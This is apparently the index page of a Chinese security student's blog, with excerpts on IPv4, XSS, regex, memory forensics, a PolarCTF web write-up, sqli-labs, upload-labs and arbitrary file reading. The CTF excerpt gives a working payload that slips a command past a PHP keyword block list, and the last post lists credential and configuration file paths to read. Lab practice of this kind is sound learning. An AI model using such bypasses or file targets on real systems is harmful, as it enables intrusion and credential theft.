IPV4的认识及nmap的使用

发表于 2025-04-02 更新于 2025-04-03 分类于计算机网络
本文字数： 614 阅读时长 ≈ 1 分钟

IPv4的认识

IPv4

Internet Protocol version 4，缩写：IPv4，又称互联网通信协议第四版。ipv4有四段8bit，共32bit的二进制字符组成，而我们一般见到的ip地址则一般被写作点分十进制，例如一个最常见的ip：192.168.1.1，他的二进制形式为：11000000.10101000.00000001.00000001。

阅读全文 »

关于xss漏洞的学习

发表于 2025-04-01 更新于 2025-04-11 分类于基础知识搭建
本文字数： 12k 阅读时长 ≈ 11 分钟

`xss`的认识和学习

[TOC]

xss平台：XSS平台-XSS测试网站-仅用于安全免费测试（有时候不太好用，推荐用服务器）

跨站脚本（Cross-Site Scripting，XSS）是一种经常出现在 WEB 应用程序中的计算机安全漏洞，是由于 WEB 应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码注入到网页中，当其他用户浏览这些网页时，就会执行其中的恶意代码，对受害用户可能采取 Cookies 资料窃取、会话劫持、钓鱼欺骗等各种攻击。

一般的，xss攻击会分为三种情况，危害程度从低到高分别是：反射型、持久型、DOM型。

阅读全文 »

re正则表达式学习

发表于 2025-03-27 更新于 2025-04-03
本文字数： 1.4k 阅读时长 ≈ 1 分钟

正则表达式的初识

正则表达式(Regular Expression) 是一种文本模式，用于匹配和筛选特定格式的文本字符串等。

为了做数据处理相关的题目，所以顺便看看学习和了解一下。

阅读全文 »

内存取证

发表于 2025-03-26 更新于 2025-04-03
本文字数： 77 阅读时长 ≈ 1 分钟

（待开）

参考文章：

volatility 取证工具的安装与配置 | X1ong

内存取证(总结篇) - r0fus0d 的博客

内存取证原理学习及Volatility - 篇一

polarctf复现

发表于 2025-03-22 更新于 2025-04-18
本文字数： 829 阅读时长 ≈ 1 分钟

web部分

swp

简单RCE

从GPT身上学到一种php中命令执行绕过思路，

<?php
/*

PolarD&N CTF

*/
highlight_file(__FILE__);
function no($txt){
    if(!preg_match("/cat|more|less|head|tac|tail|nl|od|vim|uniq|system|proc_open|shell_exec|popen| /i", $txt)){
    return $txt;}
   else{
die("what's up");}}
$yyds=($_POST['yyds']);
if(isset($_GET['sys'])&&$yyds=='666'){
  eval(no($_GET['sys']));
  }
  else
    {echo "nonono";
}
?>

可以看到是黑名单过滤，通过;可以执行多语句命令，通过变量赋值以及调用即可完成绕过，空格可以用chr(32)代替，所有字符可以利用.来进行来来连接。

1
2
3

http://032c9277-dd21-4a2e-9cc6-c3e6158ba6c8.www.polarctf.com:8090/?sys=$a="s"."ystem";$b="ca"."t".chr(32)."/flag";$a($b);

POST参数：yyds=666

还有一种思路：通过执行函数passthru()来替换system(), 空格就用${IFS}替代即可

sqli-labs刷题

发表于 2025-03-20 更新于 2025-04-19 分类于基础知识搭建
本文字数： 8.1k 阅读时长 ≈ 7 分钟

[TOC]

前言

花了两天时间，终于把sqli-lab前20关都刷完了！感觉之前只有朦胧的对sqli的印象，结果现在才知道我见过的只是get类型的union注入，最简单的那种（晕）。。。
了解和实践了很多注入手法，union，报错，延时，布尔…..前段时间面试实验室的时候其实还不了解就敢说自己懂（惭愧
《从0到1：CTFer成长之路》这本书我觉得很棒，希望能尽快看完！
我参考了很多师傅的wp以及相关文章，一并附在了文章结尾。那么，下面是我的题目总结，有一些没写或者简写，以及没有图片（还没想到怎样简化插入图片还能上传到网站的办法），如果观感不好请多担待。

阅读全文 »

upload-labs

发表于 2025-03-20 更新于 2025-04-18 分类于基础知识搭建
本文字数： 22k 阅读时长 ≈ 20 分钟

[TOC]

upload-labs靶场刷题个人总结

文件上传基本思路

一般是网站有相关的文件上传的地方，例如传图片文本之类，我们会尝试在这里绕过各种waf最终达到上传一个后门来达到连接服务器的目的。

阅读全文 »

任意文件读取漏洞

发表于 2025-03-18 更新于 2025-04-06 分类于基础知识搭建
本文字数： 848 阅读时长 ≈ 1 分钟

敏感文件总结

Linux：
/proc/self/cmdline //当前进程
/proc/self/environ //环境变量
/etc/passwd // 账户信息
/etc/shadow // 账户密码文件
/etc/my.conf //mysql 配置文件
/etc/httpd/conf/httpd.conf // Apache配置文件
/usr/local/app/apache2/conf/httpd.conf //Apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhost.conf //虚拟网站配置
/usr/local/app/php5/lib/php.ini //PHP相关配置

Windows：
C:\boot.ini //查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
C:\Windows\repair\sam //存储系统初次安装的密码
C:\Program Files\mysql\my.ini //Mysql配置
C:\Program Files\mysql\data\mysql\user.MYD //Mysql root密码
C:\Windows\php.ini //php配置信息